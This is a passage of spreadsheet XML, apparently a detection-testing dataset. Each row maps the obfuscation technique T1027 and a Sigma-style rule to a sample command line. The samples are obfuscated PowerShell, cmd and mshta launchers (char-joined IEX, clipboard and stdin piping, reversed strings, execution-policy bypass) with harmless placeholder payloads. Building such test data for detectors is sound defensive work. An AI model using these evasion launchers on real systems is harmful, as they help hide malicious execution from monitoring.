      <c r="K2462" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2463" ht="15.75" customHeight="1" s="42">
      <c r="A2463" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2463" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C2463" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D2463" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E2463" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('' , ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F2463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2463" s="43" t="n"/>
      <c r="J2463" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2463" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2464" ht="15.75" customHeight="1" s="42">
      <c r="A2464" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2464" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C2464" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D2464" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E2464" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c &amp; ([string]::Join('',([char]73,[char]69,[char]88))) 'Write-Host Educational_Test'</t>
        </is>
      </c>
      <c r="F2464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2464" s="43" t="n"/>
      <c r="J2464" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2464" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2465" ht="15.75" customHeight="1" s="42">
      <c r="A2465" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2465" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C2465" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D2465" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E2465" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]::Join('', @([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F2465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2465" s="43" t="n"/>
      <c r="J2465" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2465" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2466" ht="15.75" customHeight="1" s="42">
      <c r="A2466" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2466" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C2466" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D2466" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E2466" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]([char]73+[char]69+[char]88)) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F2466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2466" s="43" t="n"/>
      <c r="J2466" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2466" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2467" ht="15.75" customHeight="1" s="42">
      <c r="A2467" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C2467" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D2467" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E2467" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -c -"</t>
        </is>
      </c>
      <c r="F2467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2467" s="43" t="n"/>
      <c r="J2467" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2468" ht="15.75" customHeight="1" s="42">
      <c r="A2468" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2468" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C2468" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D2468" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E2468" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set VAR=Write-Output ''Execution Simulated'' &amp;&amp; powershell.exe -Command $env:VAR"</t>
        </is>
      </c>
      <c r="F2468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2468" s="43" t="n"/>
      <c r="J2468" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2468" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2469" ht="15.75" customHeight="1" s="42">
      <c r="A2469" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2469" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C2469" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D2469" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E2469" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:TEST='Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST"</t>
        </is>
      </c>
      <c r="F2469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2469" s="43" t="n"/>
      <c r="J2469" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2469" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2470" ht="15.75" customHeight="1" s="42">
      <c r="A2470" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2470" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C2470" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D2470" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E2470" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set TEST=Write-Output ''Execution Simulated'' &amp;&amp; powershell.exe -Command $env:TEST"</t>
        </is>
      </c>
      <c r="F2470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2470" s="43" t="n"/>
      <c r="J2470" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2471" ht="15.75" customHeight="1" s="42">
      <c r="A2471" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2471" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C2471" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D2471" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E2471" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = New-Object System.IO.Compression.DeflateStream($s, 0); $r = New-Object System.IO.StreamReader($d, [System.Text.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F2471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2471" s="43" t="n"/>
      <c r="J2471" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2472" ht="15.75" customHeight="1" s="42">
      <c r="A2472" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2472" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C2472" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D2472" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E2472" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = New-Object System.IO.Compression.DeflateStream($s, 0); $r = New-Object System.IO.StreamReader($d, [System.Text.Encoding]::ASCII); &amp; { $r.ReadToEnd() }"</t>
        </is>
      </c>
      <c r="F2472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2472" s="43" t="n"/>
      <c r="J2472" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2473" ht="15.75" customHeight="1" s="42">
      <c r="A2473" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2473" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C2473" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D2473" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E2473" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=in^voke &amp; set B=environment &amp; echo %A% | powershell -"</t>
        </is>
      </c>
      <c r="F2473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2473" s="43" t="n"/>
      <c r="J2473" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2474" ht="15.75" customHeight="1" s="42">
      <c r="A2474" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2474" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C2474" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D2474" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E2474" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F2474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2474" s="43" t="n"/>
      <c r="J2474" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2474" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2475" ht="15.75" customHeight="1" s="42">
      <c r="A2475" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2475" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C2475" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D2475" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E2475" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | c^l^i^p.exe &amp;&amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F2475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2475" s="43" t="n"/>
      <c r="J2475" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2475" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2476" ht="15.75" customHeight="1" s="42">
      <c r="A2476" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2476" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C2476" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D2476" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E2476" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | clip &amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F2476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2476" s="43" t="n"/>
      <c r="J2476" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2476" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2477" ht="15.75" customHeight="1" s="42">
      <c r="A2477" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2477" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C2477" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D2477" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E2477" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F2477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2477" s="43" t="n"/>
      <c r="J2477" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2477" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2478" ht="15.75" customHeight="1" s="42">
      <c r="A2478" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2478" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C2478" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D2478" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E2478" s="43" t="inlineStr">
        <is>
          <t>mshta vbscript:CreateObject("WScript.Shell").Run("calc.exe",0)(window.close)</t>
        </is>
      </c>
      <c r="F2478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2478" s="43" t="n"/>
      <c r="J2478" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2478" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2479" ht="15.75" customHeight="1" s="42">
      <c r="A2479" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C2479" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D2479" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E2479" s="43" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%"),window.close();</t>
        </is>
      </c>
      <c r="F2479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2479" s="43" t="n"/>
      <c r="J2479" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2480" ht="15.75" customHeight="1" s="42">
      <c r="A2480" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2480" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C2480" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D2480" s="43" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E2480" s="43" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F2480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2480" s="43" t="n"/>
      <c r="J2480" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2481" ht="15.75" customHeight="1" s="42">
      <c r="A2481" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C2481" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D2481" s="43" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E2481" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set VAR=Invoke-Expression 'Write-Host Safe' &amp;&amp;set RUN=powershell.exe -c (\'Te\'+\'st\') &amp;&amp; %RUN%"</t>
        </is>
      </c>
      <c r="F2481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2481" s="43" t="n"/>
      <c r="J2481" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2481" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2482" ht="15.75" customHeight="1" s="42">
      <c r="A2482" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2482" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C2482" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D2482" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E2482" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {function C2SS { ConvertTo-SecureString -String 'MySecret' -AsPlainText -Force }; C2SS }"</t>
        </is>
      </c>
      <c r="F2482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2482" s="43" t="n"/>
      <c r="J2482" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2482" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2483" ht="15.75" customHeight="1" s="42">
      <c r="A2483" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2483" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C2483" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D2483" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E2483" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'ConvertTo-SecureString'; &amp; $cmd -String 'MySecret' -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F2483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2483" s="43" t="n"/>
      <c r="J2483" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2483" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2484" ht="15.75" customHeight="1" s="42">
      <c r="A2484" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C2484" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D2484" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E2484" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $s = 'MySecret'; ConvertTo-SecureString -String $s -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F2484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2484" s="43" t="n"/>
      <c r="J2484" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2485" ht="15.75" customHeight="1" s="42">
      <c r="A2485" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C2485" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D2485" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E2485" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'ConvertTo-'; $cmd += 'SecureString'; &amp; $cmd -String 'MySecret' -AsPlainText -Force }"</t>
        </is>
      </c>
      <c r="F2485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2485" s="43" t="n"/>
      <c r="J2485" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2486" ht="15.75" customHeight="1" s="42">
      <c r="A2486" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2486" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2486" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2486" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$s = 'tpircS'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2486" s="43" t="n"/>
      <c r="J2486" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2487" ht="15.75" customHeight="1" s="42">
      <c r="A2487" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2487" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2487" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2487" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'hctac'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2487" s="43" t="n"/>
      <c r="J2487" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2488" ht="15.75" customHeight="1" s="42">
      <c r="A2488" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B2488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C2488" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D2488" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E2488" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "'$s' = 'kaerb'; $rev = [char[]]$s; [array]::Reverse($rev); iex (-join $rev)"</t>
        </is>
      </c>
      <c r="F2488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2488" s="43" t="n"/>
      <c r="J2488" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2488" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2489" ht="15.75" customHeight="1" s="42">
      <c r="A2489" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
